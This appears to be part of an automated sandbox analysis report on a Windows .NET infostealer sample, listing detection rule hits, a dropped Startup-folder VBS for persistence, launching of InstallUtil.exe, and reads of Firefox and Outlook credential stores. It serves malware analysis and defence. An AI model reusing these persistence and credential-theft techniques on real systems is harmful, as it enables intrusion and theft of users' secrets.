                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_06F7E3500_2_06F7E350
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_06F7AB580_2_06F7AB58
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_06F7E3410_2_06F7E341
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_06F7AB480_2_06F7AB48
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_06F7C9500_2_06F7C950
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_06F7C9400_2_06F7C940
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_06FD16200_2_06FD1620
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_06FD4BB00_2_06FD4BB0
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_06FD28380_2_06FD2838
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_06FD19570_2_06FD1957
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_0707F3C00_2_0707F3C0
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_070774200_2_07077420
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_070761980_2_07076198
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_070761A80_2_070761A8
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_070700060_2_07070006
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_070774100_2_07077410
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_070700400_2_07070040
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_070778C90_2_070778C9
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_070778D80_2_070778D8
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_071416980_2_07141698
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_07146D900_2_07146D90
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_07148D580_2_07148D58
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_07148D680_2_07148D68
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_0714B85C0_2_0714B85C
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_0748EEC00_2_0748EEC0
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_0748E2B80_2_0748E2B8
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_074700400_2_07470040
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_074700060_2_07470006
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00CFE5003_2_00CFE500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00CF4A903_2_00CF4A90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00CFAA103_2_00CFAA10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00CFDC983_2_00CFDC98
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00CF3E783_2_00CF3E78
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00CFD06F3_2_00CFD06F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00CF41C03_2_00CF41C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0623A1983_2_0623A198
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0623BC483_2_0623BC48
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_062466683_2_06246668
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_062456403_2_06245640
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_062424183_2_06242418
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_06247DF03_2_06247DF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0624C2003_2_0624C200
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0624B2B03_2_0624B2B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_062477103_2_06247710
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0624E4183_2_0624E418
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_06245D703_2_06245D70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_062400403_2_06240040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_062400223_2_06240022
                      Source: Ref#60031796.exeStatic PE information: invalid certificate
                      Source: Ref#60031796.exe, 00000000.00000002.2360003554.00000000063E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Ref#60031796.exe
                      Source: Ref#60031796.exe, 00000000.00000000.2115905144.0000000000866000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameref.exe8 vs Ref#60031796.exe
                      Source: Ref#60031796.exe, 00000000.00000002.2357319019.0000000003C68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#60031796.exe
                      Source: Ref#60031796.exe, 00000000.00000002.2347570758.0000000002BFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Ref#60031796.exe
                      Source: Ref#60031796.exe, 00000000.00000002.2361046731.0000000006E00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameAxvkvum.dll" vs Ref#60031796.exe
                      Source: Ref#60031796.exe, 00000000.00000002.2367253586.00000000070F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#60031796.exe
                      Source: Ref#60031796.exe, 00000000.00000002.2357319019.0000000003BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename6623bc4b-fa2b-443b-b079-7932cd528c3c.exe4 vs Ref#60031796.exe
                      Source: Ref#60031796.exe, 00000000.00000002.2347570758.0000000002E9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename6623bc4b-fa2b-443b-b079-7932cd528c3c.exe4 vs Ref#60031796.exe
                      Source: Ref#60031796.exe, 00000000.00000002.2345387570.0000000000D5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Ref#60031796.exe
                      Source: Ref#60031796.exe, 00000000.00000002.2357319019.0000000003E32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#60031796.exe
                      Source: Ref#60031796.exe, 00000000.00000002.2357319019.0000000003E32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAxvkvum.dll" vs Ref#60031796.exe
                      Source: Ref#60031796.exeBinary or memory string: OriginalFilenameref.exe8 vs Ref#60031796.exe
                      Source: Ref#60031796.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 0.2.Ref#60031796.exe.3bce418.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Ref#60031796.exe.3bce418.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: Ref#60031796.exe, -.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Ref#60031796.exe.3bce418.4.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Ref#60031796.exe.3bce418.4.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Ref#60031796.exe.3bce418.4.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Ref#60031796.exe.3bce418.4.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Ref#60031796.exe.3bce418.4.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Ref#60031796.exe.3bce418.4.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Ref#60031796.exe.3bce418.4.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Ref#60031796.exe.3bce418.4.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@6/3@3/4
                      Source: C:\Users\user\Desktop\Ref#60031796.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeMutant created: NULL
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs"
                      Source: Ref#60031796.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Ref#60031796.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Ref#60031796.exeReversingLabs: Detection: 13%
                      Source: C:\Users\user\Desktop\Ref#60031796.exeFile read: C:\Users\user\Desktop\Ref#60031796.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Ref#60031796.exe "C:\Users\user\Desktop\Ref#60031796.exe"
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\vdvfyt.exe "C:\Users\user\AppData\Roaming\vdvfyt.exe"
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\vdvfyt.exe "C:\Users\user\AppData\Roaming\vdvfyt.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: Ref#60031796.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Ref#60031796.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Ref#60031796.exe, 00000000.00000002.2360003554.00000000063E0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Ref#60031796.exe, 00000000.00000002.2360003554.00000000063E0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: Ref#60031796.exe, 00000000.00000002.2357319019.0000000003C68000.00000004.00000800.00020000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2367253586.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2357319019.0000000003E32000.00000004.00000800.00020000.00000000.sdmp
